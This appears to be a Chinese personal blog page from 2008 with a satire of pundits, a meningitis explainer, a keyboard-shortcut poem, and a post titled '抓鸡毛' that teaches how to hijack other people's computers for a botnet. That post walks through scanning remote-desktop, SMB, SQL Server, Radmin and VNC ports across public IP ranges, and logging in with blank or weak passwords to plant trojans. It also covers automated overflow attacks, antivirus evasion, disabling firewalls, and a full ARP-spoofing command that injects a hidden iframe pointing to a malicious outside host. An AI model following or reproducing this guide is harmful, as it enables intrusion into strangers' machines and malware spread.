2008年7月29日星期二

砖家论--转于QQ空间

一、不管别人提什么千奇百怪的问题,你都要回答:"这很正常。"这样做的好处是,既说明了自己见多识广,又能说明别人少见多怪,从而确立自己的专家地位。例如:有人问"为什么汶川地0震.,我们国家的地0震.局,没有任何的预0测.?"你可以说:"这很正常,地0震.预0测.是世界性难题。"有人问:"为什么地0震.中学校的校舍倒塌的那么多。"你可以说:"这很正常,地0震.的强度超过八级,所有的房屋都有倒塌的可能。"有人问:"为什么中国足球,搞了这么多年改革,现在连伊拉克都踢不过?"你可以说:"这很正常,因为足球比赛中有很多不确定因素。"有人问:"你为什么老是说这很正常?"你可以说:"这很正常,因为我是专家。"
  二、要与正常人的见解有区别。专家之所以称为专家,就是要见人所未见,言人所未言。例如:有人说:"物价涨的太厉害了。"你要说:"不是物价涨,是中国的东西太便宜。"有人说:"股市跌得太厉害了,政府应该救市"你要说:"不行,要坚持中国股市的自由市场经济地位,避免政府对股市的干预。"有人说: "CPI增长了8.4%,活不了了。"你要说:"这样的物价水平,大多数人都能接受。"有人问:"你为什么我说东时,你总是说西?"你可以说:"这很正常,因为我要是也说东,你会要我说吗?"
  三、分析问题原因的时候,要分出一二三四。这一点很重要,就算是一个原因,你也要分出一二三四来,这样做,才能显示你对问题确实有研究,不愧对专家的称号。如果说一二三四的同时,你还遵循了先世界后中国的顺序,那么你就可以成为著名专家了。例如,你可以说:"我分析汶川地0震.中校舍大量倒塌主要有三个原因:一从世界范围上来说,都存在地0震.中校舍倒塌的问题。例如美国……二是校舍倒塌,主要是因为地0震.的强度比较大。三校舍倒塌,也存在建筑不合格的可能。"你还可以说:"我分析这次发改委提高油价有三个原因:一主要是受国际上油价上涨的影响。二人民群众对柴油的求量增加。三石油生产企业的供应量减少。" 有人问:"你为什么总是用一二三四?"你可以说:"这很正常,你看到任何人用四三二一吗?"
  四、要说那些别人听不懂或者听完之后就迷糊的话,而且自己懂不懂没关系。例如有人问:"中国平安为什么会推出如此庞大的融资计划?"你可以说:"股市最重要的功能之一就是再融资,从经济学的角度讲#¥……。"有人问:"你觉得中国楼价这么高正常吗?" 你可以说:"我们必须一分为二的看问题,虽然从某个角度来说,不正常,但是从社会学上来讲……"有人问:"为什么听完您的讲话,我有点困,还是不明白。"你可以说: "恭喜你,犯困是正常的,表示你开始听懂我说的东西内其中的奥妙了,不明白是正常的,否则我还能算是专家吗!"
  五、有两个最重要的原则,是保证你成为专家之后能在国家媒体上保持上镜率的关键:一要有大局观念。例如,你可以说:"虽然我们的法制法规还不太完善,但是目前我们国家在这一方面已经有了长足的发展……"你还可以说:"虽然地0震.不可预0测.,但是我们国家对于地0震.的科研工作还是相当的重视……"你甚至可以说:"虽然中国的专家都是事后诸葛亮,但是我们国家在这个问题上看到了许多打马后炮的优点……"二善于顾左右而言他。例如,你可以说:"对于你提到中国看病难的问题,美国也存在这样的问题。我记得德克萨斯州……"你可以说:"警察打人这样的事,只是警察队伍中个别人的个别问题,曰本也有这样的情况,我记得在东京……" 有人问:"你为什么总是拿别国说事?"你可以说:"这很正常,你听过外国月亮比较圆吗?"
  六、最后这招,是大家都熟悉的绝招了,那就是:只要在正常的浮动范围内、与世界接轨和中国特色。因为这是绝招,大家又是耳熟能详,所以在此,不再赘述。只举些例子:你甚至可以说:"一般而言,一个预0测.分析的可信度有三个看点:一从世界范围来看,专家的预0测.通常都有盲点,只要在正常的浮动范围内。二人民群众的智商明显提高,使得预0测.盲点有连成线的趋势,只要这个线的摆动在正常的浮动范围内。三有些个别专家,为了讨好人民需要,又将盲点由线扩大成面,别看这么大片面积,只要这个面在正常的浮动范围内,这些现象都算是正常的,这些预0测.都算是可信的。"碰到有人问:"你的这些预0测.跟我吓懵的有什么不一样,为什么你的工资这么高?"你可答:" 与世界专家接轨。"那人再问:"为什么别的国家专家的预0测.和你的不一样?"你可答:"这是中国特色。"
  综上所述,有此六技,则专家头衔可得矣!但是预防有人来踢馆时说:"你这专家狗屁不通。"你要会说:"起码我是吹牛皮,牛狗不同体,不通也是天然形成的,证明我是不可能放狗屁的。

2008年7月19日星期六

流脑

医疗界有关人士介绍说,流脑是由脑膜炎双球菌引起的化脓性炎症,具有较强的传染性,每年冬春季,流脑的发病率可以占到急性细菌性传染病的第一位。流脑三大易感人群是儿童、老人和民工。


      脑膜炎双球菌首先侵入呼吸道,患者会在发病的第一天出现类似上呼吸道感染的症状,如发热、鼻塞及轻微咳嗽等。到了第2—3天,致病细菌很快进入血液系统,破坏掉人体正常的血细胞,形成败血症,导致感染中毒性休克。患者表现为寒战高热、面色苍白、精神不振,身上出现淤斑或淤点。病菌还会通过血脑屏障,进入到脑组织中,导致脑膜炎,出现剧烈头痛、喷射性呕吐,甚至抽搐。



      流脑引起的中枢神经系统感染,若得不到及时有效的治疗,患者可能因循环衰竭、呼吸衰竭而死亡,死亡率高达10%左右。

2008年7月7日星期一

如果

如果失败的人生可以F5
      如果逝去的岁月可以CTRL+C
         如果甜蜜的往事可以CTRL+V
   如果莫名的悲伤可以DEL
           如果一切都可以CTRL+ALT+DEL
     那么我们所有的故事都不会ALT+F4
          如果没有OPEN那一刻的惊奇
   也不会有SHUT时的失落

2008年7月1日星期二

抓鸡毛

新手如果做不好黒防鸽子的免杀的话,建议换个别的木马,如守望者,上兴 ,黑洞 and so on.相对而言免杀比较好做。免杀几乎是一切基础,所以一定要学好免杀,我们的甲壳虫论坛的免杀方面很不错,新手朋友要多多学习了,多思考,多动手,多提问,相信你免杀会有很大的进步的,(*^__^*) 嘻嘻……
  这里讲解下原理和方法,不具体操作演示,不方便还要控制下教程的大小,另外重要的是我认为新手朋友应该多自己动手实践下,看别人的教程演示跟着一般的做是不会有什么很大的进步,要学习思路和原理,自己动手实践,在不断的解决困难中进步。我走到今天的一点点感触,和新手分享下。
下面开始正题:
1:扫3389端口肉鸡
  
  这个方法比较简单,适合新手朋友。

原理:
      国内流传着一种克隆版的XP,安装后会默认开启一个账号为new,密码为空的账户,而且基本上都是默认开放3389服务的,我们就可以利用这一点来抓肉鸡
方法:
     扫描工具(如S等等)扫一段IP的3389端口,扫完后就直接用3389连接器连接开放3389的机器,也可以把结果保存为文本,用批量生成3389连接的工具生成链接,比较方便的,然后输入账号new登入,如果别人的电脑前没人的话你就可以去你的空间下载你传好的木马然后安装。
       这种方法只能是XP系统,如果遇到2000或者2003系统就不要试了,除非有输入法漏洞,不过现在很少了,还有那么多的3389,干嘛在它上面浪费时间呢。汗- -!
       这个方法缺点也是大大的,XP只支持单用户登入,,你再登入上去就会把他挤出去,而且不可以抓国外的肉鸡
建议:中午或者半夜行动,因为有很多的人会开着机子下载,杀毒啊,去睡觉。我们就有可乘之机了。(*^__^*) 嘻嘻……
2:扫135端口抓肉鸡

步骤:A:
      a-先用扫描器扫一段IP的135端口
      
      b-整理一下
      
      c-NTSCAN过滤有弱口令的机器
     
      d-最后用recton开telnet传马
  
      B:
      有一些自动抓鸡工具,功能类似,如Bluisland,Wmi,蜜蜂,知音等等,比较傻瓜化的。
这里简单说两点:Bluisland 木马改名为 boot.exe , IP保存为ip.txt,放在同一个目录下。
                Wmi 需要修改,具体看操作。

问题:因为国内的一些网络运营商屏蔽了一部分的端口,你可能扫不到135,或者扫到的135没有检测到空口令?!怎么办?!
解决:1:你要开了这3个服务就可以开通
         
      我的电脑--管理---服务
      TCP/IP NetBIOS Helper
      Remote Procedure Call (RPC) Locator
      NT LM Security Support Provider  
2:xp打线程补丁 一般线程为1000-3000之间就可以了 如果还扫不到就打4000
打好补丁之后重启。
3:抓鸡前关掉杀软和防火墙(包括系统自带的防火墙)
4:木马一定要免杀 扫的IP范围不要太大 XP系统扫的不是很快 有条件的见意装个2000或者2003系统,可以用syn方式扫
5:换个ip段扫。可以扫下本地的ip段。
6:终极解决方案,拿个服务器扫,这是最好的方法。
   或者在鸽子或者别的肉鸡上扫,上传S扫描器
首先要关防火墙 CMD命令 net stop alg /y 或者net stop sharedaccess
S扫描器命令: s.exe syn《xp的机子为tcp》 开始IP,结束IP 端口 线程/save
              s.exe syn 125.108.0.0 125.108.155.255 1433 700 /save

  3: 扫445端口抓肉鸡
     扫135抓肉鸡差不多,先用扫描器扫一段IP的445端口,然后把结果整理,再用NTSCAN过滤有弱口令的机器,最后开共享传马,可以用啊D工具包。
   屏蔽的话可以扫本地的445试下。
  
  4:1433端口批量溢出抓肉鸡
  
  原理:可以利用漏洞溢出实现全自动抓鸡,不过现在太多人搞,成功率不是很高。
  
  工具:S.exe sqlhello.exe nc.exe 批处理文件
  
  方法:先打开多个NC监听,然后再打开扫描溢出的.bat,然后你就可以去睡觉去了。自动扫描,扫描完后        自动溢出,溢出后自动下马执行。
       这就是批处理的威力,希望大家有时间多专研下,我在论坛发布的有详细的批处理教程文章。

另外有42 21等端口的溢出,原理都是类似的,大家自己尝试下吧。
  
5:   扫1433弱口令抓肉鸡
   工具:端口扫描器 X-scan 和 SQL综合利用工具
   
   原理:开1433端口的机器一般都装有SQL,所以我们可以猜测SQL弱口令来抓1433肉鸡
   方法:
       先用端口扫描器扫一段IP的1433端口,然后结果保存为文本文件,
      
       接着用X-scan导入这些开了1433的IP,然后在扫描参数-全局设置-扫描模块这一栏里只勾上SQL-SERVER就可以了,其他不要勾。然后在插件设置-端口相关设置-待检测端口这一栏,只填1433端口。然后就可以开始扫描了,扫描完成后会有个报告,列出了有弱口令的机器,
      
      然后打开SQL综合利用工具,输入你扫到的弱口令来连接,接着打开SQL综合利用工具-利用目录,上传你的木马,然后在用DOS命令执行你的木马。
  
    另解:WINNTAutoAttack 原理一样。
  6:扫4899空口令抓肉鸡
   
   工具:扫描器 4899探测器 Radmin
   
   原理: Radmin开放的端口默认为4899.

   方法:先用端口扫描器扫一段IP的4899端口
      
         用4899探测器导入开了4899端口的IP,过滤下
      
         Radmin连接有空口令的机器,带开文件管理,上传运行你木马
  7: 扫5900端口抓VNC肉鸡
    工具:VNC扫描器 VNC连接器
    原理:VNC开放5900端口
   
    方法:先用VNC扫描器扫描一段IP的5900端口,
          扫描格式为vscan.exe(扫描器文件名) -i 219.0.0.0-219.255.255.255(扫描IP段) -p 5900 -vnc -vv  建议扫国外的ip段,国外用这个的比较多,一般机子也不错的。
          扫描完成后会在扫描器所在的同一文件夹生成一个文本文件,打开后有一列IP,IP后面的有一些单词比如patched,banned,vulnerable,只有为vulnerable才能连接。接着就用VNC连接器连接。

  8: ARP局域网欺骗挂马
   
     ARP命令: zxarps.exe -idx 0 -ip 192.168.0.2-192.168.0.99 -port 80 -insert "<iframe src='xx' width=0 height=0>"
这里网马地址就假设为  http://www.darkst.com/  那么命令就是
zxarps.exe -idx 0 -ip 192.168.0.2-192.168.0.99 -port 80 -insert "<iframe src='http://www.darkst.com/' width=0 height=0>"
接上 3389 服务器 服务器必须安装 winPcap.exe 工具都有打包
然后就执行  zxarps.exe -idx 0 -ip 192.168.0.2-192.168.0.99 -port 80 -insert "<iframe src='http://www.darkst.com/' width=0 height=0>"   IP自己改
  
zxarps.exe是免杀的  先安装WinPcap_4_0.exe 然后运行1.bat的批处理 输入命令zxarps.exe就可以了
这样就可以把马挂上拉 如果拿到一台内网机器 整个机房的机器都可以挂上马
   
     这个方法我还没尝试过,大家可以实验下。听说效果不错的。
9 :另外一些思路
   
   快乐行 vLan 等。
  教程结束,大家有什么不懂的可以去论坛发帖或者去群里问。有什么好的方法建议也可以和我说下。
  工具就不打包了,太大了。汗!论坛上或者别的黑客工具下载网站都,大家自己找下,实在没有的找我要,群ID:后门。(*^__^*) 嘻嘻……